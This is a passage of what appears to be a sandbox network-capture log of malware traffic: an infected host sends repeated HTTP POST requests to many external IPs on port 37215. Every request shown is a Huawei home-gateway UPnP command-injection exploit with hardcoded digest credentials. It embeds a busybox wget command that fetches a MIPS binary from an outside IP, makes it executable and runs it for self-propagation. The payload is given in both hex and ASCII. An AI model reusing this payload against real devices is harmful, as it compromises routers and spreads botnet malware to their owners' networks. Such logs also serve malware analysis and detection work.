69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  581192.168.2.1352870157.33.109.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325877905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  582192.168.2.1349996157.223.190.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325896025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  583192.168.2.1345624157.135.46.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325916052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  584192.168.2.1341262197.71.250.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325942039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  585192.168.2.134006083.140.237.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325968027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  586192.168.2.1354348197.50.245.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325982094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  587192.168.2.135149241.126.48.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326011896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  588192.168.2.1341084197.120.71.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326026917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  589192.168.2.134380041.108.17.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326045990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  590192.168.2.1338722197.119.38.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326061010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  591192.168.2.1339428157.95.201.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.326081038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
